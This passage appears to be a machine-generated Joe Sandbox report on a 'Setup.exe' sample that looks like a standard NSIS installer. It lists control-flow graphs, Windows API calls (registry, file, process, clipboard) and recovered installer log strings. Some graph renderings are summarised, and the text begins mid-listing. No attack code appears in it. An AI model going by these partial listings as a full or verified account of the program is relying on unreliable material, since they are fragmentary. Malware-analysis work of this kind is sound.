4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 
Call graph (the interactive node/edge rendering did not survive extraction; only the node labels are recoverable). Nodes are function and basic-block start addresses in the 0x401000 to 0x407000 range, annotated with the API the block calls or with "N API calls" for a helper. APIs named in the graph include: registry access (RegOpenKeyExW, RegQueryValueExW, RegEnumKeyW, RegEnumValueW, RegCloseKey); file and directory handling (CreateFileW, ReadFile, WriteFile, SetFilePointer, GetFileAttributesW, SetFileAttributesW, SetFileTime, CompareFileTime, DeleteFileW, CopyFileW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetCurrentDirectoryW, FindFirstFileW, FindNextFileW, FindClose, GetFullPathNameW, GetShortPathNameW, SearchPathW, GetTempPathW, GetWindowsDirectoryW, GetSystemDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, WritePrivateProfileStringW); process and library handling (CreateProcessW, WaitForSingleObject, GetExitCodeProcess, ShellExecuteW, GetCurrentProcess, ExitProcess, ExitWindowsEx, LoadLibraryA, LoadLibraryW, GetProcAddress, GetModuleHandleA, GetModuleHandleW, GetCommandLineW, GetVersion, GetTickCount, Sleep, SetErrorMode, OleInitialize, CoUninitialize, SHGetFileInfoW, an ordinal import #17); memory (GlobalAlloc, GlobalFree); and UI plumbing (CreateDialogParamW, DialogBoxParamW, CreateWindowExW, RegisterClassW, SendMessageW, PeekMessageW, DispatchMessageW, SetWindowLongW, SetWindowTextW, SetDlgItemTextW, GetDlgItem, LoadImageW, MessageBoxIndirectW, SetForegroundWindow, PostQuitMessage). One helper (address 004062CF) formats log strings with lstrlenW and wvsprintfW, including the literal "RMDir: RemoveDirectory invalid input("")".

Control-flow Graph

Control-flow graph of the function at 004050F9 (basic blocks 4050F9 through 4054A0; the rendering, which coloured each block Executed or Not Executed, did not survive extraction). Besides the APIs listed below, the graph's blocks call CreateThread, CloseHandle, CreatePopupMenu, AppendMenuW, GetWindowRect, TrackPopupMenu, OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData and CloseClipboard: a SendMessageW loop over the list items followed by the clipboard sequence, which is consistent with a context-menu handler that copies the dialog's list-view contents to the clipboard.
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
• CloseClipboard.USER32 ref: 0040549A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
• String ID: New install of "%s" to "%s"${
• API String ID: 2110491804-1641061399
• Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
• Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
APIs
• #17.COMCTL32 ref: 004038CE
• SetErrorMode.KERNELBASE(00008001), ref: 004038D9
• OleInitialize.OLE32(00000000), ref: 004038E0
  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
• SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
• GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
• GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
• CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
• GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
• GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
• lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
• DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
• CoUninitialize.COMBASE(?), ref: 00403AFD
• ExitProcess.KERNEL32 ref: 00403B1D
• lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
• lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
• CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
• SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
• DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
• CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
• CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
• GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
• String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
• API String ID: 2435955865-3712954417
• Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
• Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
• Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
• Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
APIs
• FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
• FindClose.KERNEL32(00000000), ref: 00406318
Strings
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: jF
• API String ID: 2295610775-3349280890
• Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
• Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
• Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
• Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Control-flow Graph (node legend: Executed / Not Executed)

control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
APIs
• GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
• LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
• GetProcAddress.KERNEL32(00000000), ref: 00406353
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID:
• API String ID: 310444273-0
• Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
• Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
• Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
• Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Control-flow Graph (node legend: Executed / Not Executed)

control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
APIs
• PostQuitMessage.USER32(00000000), ref: 00401648
• Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
• SetForegroundWindow.USER32(?), ref: 004016CB
• ShowWindow.USER32(?), ref: 00401753
• ShowWindow.USER32(?), ref: 00401767
• SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
• CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
• GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
• GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
• SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
• MoveFileW.KERNEL32(00000000,?), ref: 00401908
• GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
• GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
• SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
Strings
• IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
• Rename on reboot: %s, xrefs: 00401943
• Rename: %s, xrefs: 004018F8
• SetFileAttributes: "%s":%08X, xrefs: 0040177B
• Aborting: "%s", xrefs: 0040161D
• Rename failed: %s, xrefs: 0040194B
• Sleep(%d), xrefs: 0040169D
• detailprint: %s, xrefs: 00401679
• IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
• SetFileAttributes failed., xrefs: 004017A1
• CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
• CreateDirectory: "%s" (%d), xrefs: 004017BF
• BringToFront, xrefs: 004016BD
• CreateDirectory: "%s" created, xrefs: 00401849
• Call: %d, xrefs: 0040165A
• Jump: %d, xrefs: 00401602
• CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Memory Dump Source
• Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Setup.jbxd
Similarity
• API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
• String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
• API String ID: 2872004960-3619442763
• Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
• Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
• Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
• Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

Control-flow Graph (node legend: Executed / Not Executed)

control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 KiUserCallbackDispatcher * 2 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
• ShowWindow.USER32(?), ref: 004054FE
• DestroyWindow.USER32 ref: 00405512
• SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
• GetDlgItem.USER32(?,?), ref: 0040554F
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
• IsWindowEnabled.USER32(00000000), ref: 0040556A
• GetDlgItem.USER32(?,00000001), ref: 00405619
• GetDlgItem.USER32(?,00000002), ref: 00405623
